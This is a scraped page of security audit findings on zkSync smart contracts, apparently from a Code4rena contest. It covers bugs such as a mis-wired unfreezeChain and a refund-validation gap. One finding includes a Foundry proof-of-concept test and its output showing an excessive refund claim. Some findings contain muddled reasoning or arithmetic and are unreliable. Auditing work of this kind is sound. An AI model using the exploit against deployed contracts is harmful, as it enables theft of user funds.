// Transfer tokens to the shared bridge
}

Data Availability Issues:

Error: The mappings depositAmount and isWithdrawalFinalized are used to store data related to deposits and withdrawals, but there's no access control or validation mechanism to ensure data integrity or restrict access.

Solution: Implement access control checks and validation mechanisms to ensure that only authorized users can access or modify the data stored in these mappings. You can use modifiers or require statements to enforce access control and validate inputs before updating the mappings.

EVM Compatibility Attacks:

Error: The contract lacks protection against reentrancy attacks, especially in functions like deposit and claimFailedDeposit where external calls are made and state is modified.

Solution: Use the nonReentrant modifier to prevent reentrancy attacks in functions that involve external calls or state modifications. You can apply this modifier to relevant functions to ensure that reentrant calls cannot occur. Here's an example of how to implement the nonReentrant modifier:

modifier nonReentrant() {
require(!_locked, "Reentrant call detected");
_locked = true;
_;
_locked = false;
}

Ensure that the _locked variable is properly initialized and reset within the modifier. Apply this modifier to relevant functions to protect against reentrancy attacks.

Gas-related Vulnerabilities:

Error: Gas limits for external calls are passed as parameters to functions like deposit, which may lead to potential gas-related vulnerabilities if not set appropriately.

Solution: Review the gas limits passed to external calls in functions like deposit and ensure that they are set appropriately based on the expected gas consumption. Consider using safe gas limits and performing gas estimation to prevent potential gas-related exploits. Additionally, consider optimizing gas usage in critical functions to minimize the risk of gas-related vulnerabilities.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

Tool Used

Remix

Recommended Mitigation Steps

Assessed type

Error

state-transition#unfreezeChain is freezeChain in fact

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L159-L167

Vulnerability details

Impact

state-transition#unfreezeChain is freezeChain in fact. When owner tries to unfreezeChain, he freezeChain again, which means, he couldn't unfreeze chain.

Proof of Concept

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L159-L167

/// @dev freezes the specified chain
function freezeChain(uint256 _chainId) external onlyOwner {
    IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
}

/// @dev freezes the specified chain
function unfreezeChain(uint256 _chainId) external onlyOwner {
    IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
}

In function unfreezeChain(), shoud be :
IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();

Tools Used

manually reviewed.

Recommended Mitigation Steps

change function unfreezeChain() to the following:

function unfreezeChain(uint256 _chainId) external onlyOwner {
IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();
}

Assessed type

Other

Mathematical inaccuracy can lead to wrong prices

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L167
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L171

Vulnerability details

Impact

The mathematical inaccuracy in the calculation involving uint256 fullPubdataPriceBaseToken and l2GasPrice can result in precision loss

Proof of Concept

In the principle of PEDMAS/BODMAS, division comes before addition. But in the case of uint256 fullPubdataPriceBaseToken, the case is reversed. This can cause the return of wrong results. For instance, let pubdataPriceBaseToken be 10 wei, batchOverheadBaseToken be 20 wei and uint256(feeParams.maxPubdataPerBatch) be 5 wei.

Without the PEDMAS, fullPubdataPriceBaseToken will give 6 wei but result in 14 wei with PEDMAS application

Tools Used

Manual Review

Recommended Mitigation Steps

Division should come first before addition in calculations or the parameters involved in the division should be encapsulated properly:

uint256 fullPubdataPriceBaseToken = pubdataPriceBaseToken +
(batchOverheadBaseToken / uint256(feeParams.maxPubdataPerBatch));

Or:
uint256 fullPubdataPriceBaseToken = (pubdataPriceBaseToken +
batchOverheadBaseToken) / uint256(feeParams.maxPubdataPerBatch

whichever calculation is intended. Same should also apply to the l2gasprice calculation

Assessed type

Error

Loss of Fund During Execution of Call Data

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/governance/Governance.sol#L226

Vulnerability details

Impact

Loss of fund when msg.value is greater than cumulative sum of _calls[i].value in the execution function call

Proof of Concept

 function _execute(Call[] calldata _calls) internal {
        for (uint256 i = 0; i < _calls.length; ++i) {
>>>            (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
            if (!success) {
                // Propagate an error if the call fails.
                assembly {
                    revert(add(returnData, 0x20), mload(returnData))
                }
            }
        }
    }

The code above shows how _execute(...) function is implemented in the Governance contract, there is a loop through calls array with _calls[i].value being used for each loop, the problem is that there is no validation to ensure the sum of _calls[i].value used is equal msg.value which would allow excess fund not used to be lost to the contract.

Tools Used

Manual Review

Recommended Mitigation Steps

The _execute(...) function should adjust code to ensure there is a validation to prevent lose of fund to contract as provided below

 function _execute(Call[] calldata _calls) internal {
+++ uint callValueSum;
        for (uint256 i = 0; i < _calls.length; ++i) {
            (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
+++        callValueSum += _calls[i].value;
            if (!success) {
                // Propagate an error if the call fails.
                assembly {
                    revert(add(returnData, 0x20), mload(returnData))
                }
            }
        }
+++ require (msg.value == callValueSum , "TransactionError" );
    }

Assessed type

ETH-Transfer

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

Users might be charged unfair amount of baseToken for L2Gas due to vulnerable baseToken price conversion implementation

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L159-L160
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L79

Vulnerability details

Impact

Users might be charged unfair amount of baseToken for L2Gas due to vulnerable baseToken price conversion implementation.

Proof of Concept

Hyperchain allows non-eth baseToken chains. When user request L1->L2 transactions to a non-eth chain, users will pay L2 gas in baseToken instead of ETH.

The problem is baseToken l2 gas conversion might be using an outdated ratio of baseToken/ETH due to a vulnerable baseToken price update implementation setTokenMultiplier.

When a user request a L1->L2 transaction, Mailbox checks if user sent enough baseToken(mintValue) to cover gas(baseCost) in _requestL2Transaction(). uint256 baseCost = _params.l2GasPrice * _params.l2GasLimit; l2GasPrice is calculated in _deriveL2GasPrice() based on baseToken multipliers.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol
    function _deriveL2GasPrice(
        uint256 _l1GasPrice,
        uint256 _gasPerPubdata
    ) internal view returns (uint256) {
...
 |>       uint256 l1GasPriceConverted = (_l1GasPrice *
            s.baseTokenGasPriceMultiplierNominator) /
            s.baseTokenGasPriceMultiplierDenominator;
        uint256 pubdataPriceBaseToken;
...

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L159-L160)

However, s.baseTokenGasPriceMultiplierNominator and s.baseTokenGasPriceMultiplierDenominator can only be updated in setTokenMultiplier() by the chain admin, which is most likely a multi-sig contract. Since base token is not updated dynamically, this will result in an old or assumed baseToken/ETH ratio being used for baseCost check. User is charged a baseCost based on and outdated baseToken/ETH ratio. The user can be overcharged.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol
//@audit setTokenMultiplier can only called by chain Admin after chain genesis, the chain Admin is most likely a multi-sig contract, which will not update baseToken/ETH ratio in time, resulting in stale price.
    function setTokenMultiplier(
        uint128 _nominator,
        uint128 _denominator
|>    ) external onlyAdminOrStateTransitionManager {
...
        s.baseTokenGasPriceMultiplierNominator = _nominator;
        s.baseTokenGasPriceMultiplierDenominator = _denominator;
...

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L79)

Tools Used

Manual

Recommended Mitigation Steps

Consider allowing baseToken multipliers to be updated dynamically, not just by admin multi-sig.

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

StateTransitionManager.unfreezeChain calls wrong function

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L166

Vulnerability details

Proof of Concept

Using StateTransitionManager.freezeChain function admin can freeze specific chain. This means that all non freezable facets will not be callable anymore.

StateTransitionManager.unfreezeChain function should do the opposite action, however it by mistake calls freeze as well, which means that it will be not possible to unfreeze proxy.

Impact

Not possible to unfreeze proxy. Need to do upgrade.

Tools Used

VsCode

Recommended Mitigation Steps

Use correct function to unfreeze.

Assessed type

Error

User will pay more gas than defined in Ethereum Yellow Paper

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/bootloader/bootloader.yul#L101-L107

Vulnerability details

Impact

The Ethereum Yellow Paper defines two types of G_txdata:

G_txdatazero - 4 Paid for every zero byte of data or code for a transaction.
G_txdatanonzero - 16 Paid for every non-zero byte of data or code for a transaction.

As we see, non-zero byte of data costs more (16) than a zero byte (4).

However, L1_GAS_PER_PUBDATA_BYTE() implemented in the bootloader.yul does not distinguish between zero byte of data or code for a transaction and non-zero byte of data or code for a transaction. Every operation costs 17. This behavior implies user loss - because the user will always pay the constant amount of gas, even for non-zero byte of data or code for a transaction (which should costs less than a non-zero byte).

Proof of Concept

File: bootloader.yul

 /// @dev The number of L1 gas needed to be spent for
            /// L1 byte. While a single pubdata byte costs `16` gas, 
            /// we demand at least 17 to cover up for the costs of additional
            /// hashing of it, etc.
            function L1_GAS_PER_PUBDATA_BYTE() -> ret {
                ret := 17
            }

As demonstrated above, the number of L1 gas needed to be spend for L1 byte is always constant and it's hardcoded to 17.
User will pay 17 gas no matter if it's the zero or non-zero byte of data or code for a transaction.

According to Ethereum Yellow Paper, zero bytes costs less (4) than non-zero ones (16). This requirement is, however, not fulfilled in the bootloader.yul, because both zero and non-zero L1 byte costs 17.

Tools Used

Manual code review

Recommended Mitigation Steps

Separate costs for zero and non-zero byte of data or code for a transaction. The zero byte of data or code for a transaction should cost less.

Assessed type

Other

An attacker could potentially claim another person's refund or apply for an excessive refund through the `claimFailedDepositLegacyErc20Bridge`.

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L329-L345
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L644-L666

Vulnerability details

When initiating a refund request from the Legacy Bridge contract using claimFailedDepositLegacyErc20Bridge.

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L644-L666

    function claimFailedDepositLegacyErc20Bridge(
        address _depositSender,
        address _l1Token,
        uint256 _amount,
        bytes32 _l2TxHash,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes32[] calldata _merkleProof
    ) external override onlyLegacyBridge {
        _claimFailedDeposit(
            true,
            ERA_CHAIN_ID,
            _depositSender,
            _l1Token,
            _amount,
            _l2TxHash,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _merkleProof
        );
    }

It calls the internal function _claimFailedDeposit.

  • _isEraLegacyWithdrawal as true,
  • weCanCheckDepositHere as false,
  • notCheckedInLegacyBridgeOrWeCanCheckDeposit as false.
    According to the logic, this pathway does not verify the deposit details (who initiated the deposit, what token was deposited, and the amount of the deposit).

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L329-L345

        {
            bool notCheckedInLegacyBridgeOrWeCanCheckDeposit;
            {
                // Deposits that happened before the upgrade cannot be checked here, they have to be claimed and checked in the legacyBridge
                bool weCanCheckDepositHere = !_isEraLegacyWithdrawal(_chainId, _l2BatchNumber);
                // Double claims are not possible, as we this check except for legacy bridge withdrawals
                // Funds claimed before the update will still be recorded in the legacy bridge
                // Note we double check NEW deposits if they are called from the legacy bridge 
                notCheckedInLegacyBridgeOrWeCanCheckDeposit = (!_checkedInLegacyBridge) || weCanCheckDepositHere; 
            }
            if (notCheckedInLegacyBridgeOrWeCanCheckDeposit) {
                bytes32 dataHash = depositHappened[_chainId][_l2TxHash];
                bytes32 txDataHash = keccak256(abi.encode(_depositSender, _l1Token, _amount));
                require(dataHash == txDataHash, "ShB: d.it not hap");
                delete depositHappened[_chainId][_l2TxHash];
            }
        }

Impact

  • Impersonation: Attackers could claim refunds for deposits they did not initiate, effectively impersonating legitimate users.
  • Excessive Refunds: Attackers might claim more than the actual failed deposit amount, leading to excessive refunds.

Proof of Concept

Attack scenario:

  1. Alice deposits 50 tokens on L1 before the Legacy Bridge update to the Shared Bridge.
  2. The deposit fails to roll up to L2 for some reason.
  3. Alice does not immediately request a refund from L1.
  4. The system is updated to the Shared Bridge.
  5. Alice requests a refund of 55 tokens from Legacy Bridge calling claimFailedDepositLegacyErc20Bridge.
  6. Since the deposit details (who initiated the deposit, what token was deposited, and the amount of the deposit) are not verified,
  7. Alice gets an excessive refund.

Test code

Added the test_excessiveRefundAttack function in L1ShardBridgeLegacy.t.sol

    function test_excessiveRefundAttack() public {
        // mint 100 for shareBridge,50 from alice, 50 from others
        token.mint(address(sharedBridge), amount);

        // storing depoistHappend[chainId][l2TxHash] = txDataHash. DepositHappened is 3rd so 3 -1 + dependency storage slots
        uint256 depositLocationInStorage = uint256(3 - 1 + 1 + 1);
        uint256 amountAlice = 50;
        uint256 amountAliceExcessive = 55;
        bytes32 txDataHash = keccak256(abi.encode(alice, address(token), amountAlice));
        vm.store(
            address(sharedBridge),
            keccak256(abi.encode(txHash, keccak256(abi.encode(ERA_CHAIN_ID, depositLocationInStorage)))),
            txDataHash
        );
        require(sharedBridge.depositHappened(ERA_CHAIN_ID, txHash) == txDataHash, "Deposit not set");
        
        uint256 chainBalanceLocationInStorage = uint256(6 - 1 + 1 + 1);
        vm.store(
            address(sharedBridge),
            keccak256(
                abi.encode(
                    uint256(uint160(address(token))),
                    keccak256(abi.encode(ERA_CHAIN_ID, chainBalanceLocationInStorage))
                )
            ),
            bytes32(amount)
        );

        // Bridgehub bridgehub = new Bridgehub();
        // vm.store(address(bridgehub),  bytes32(uint256(5 +2)), bytes32(uint256(31337)));
        // require(address(bridgehub.deployer()) == address(31337), "Bridgehub: deployer wrong");
        
        vm.mockCall(
            bridgehubAddress,
            abi.encodeWithSelector(
                IBridgehub.proveL1ToL2TransactionStatus.selector,
                ERA_CHAIN_ID,
                txHash,
                l2BatchNumber,
                l2MessageIndex,
                l2TxNumberInBatch,
                merkleProof,
                TxStatus.Failure
            ),
            abi.encode(true)
        );
        console2.log("Alice Before Refound: ", token.balanceOf(alice));

        vm.prank(l1ERC20BridgeAddress);
        sharedBridge.claimFailedDepositLegacyErc20Bridge(
            alice,
            address(token),
            amountAliceExcessive,
            txHash,
            l2BatchNumber,
            l2MessageIndex,
            l2TxNumberInBatch,
            merkleProof
        );
        console2.log("Alice Excessive Refound: ", token.balanceOf(alice));
    }

You should get the following output:

[PASS] test_excessiveRefundAttack() (gas: 138031)
Logs:
  Alice Before Refound:  0
  Alice Excessive Refound:  55

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.74ms

In addition to this, If an attacker can get a genuinely failed L2 deposit transaction, he can initiate a refund.

Tools Used

Manual

Recommended Mitigation Steps

Enhanced Verification: Increase the verification of key information such as the depositor, amount, and token type when processing refund requests.

Assessed type

Invalid Validation

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.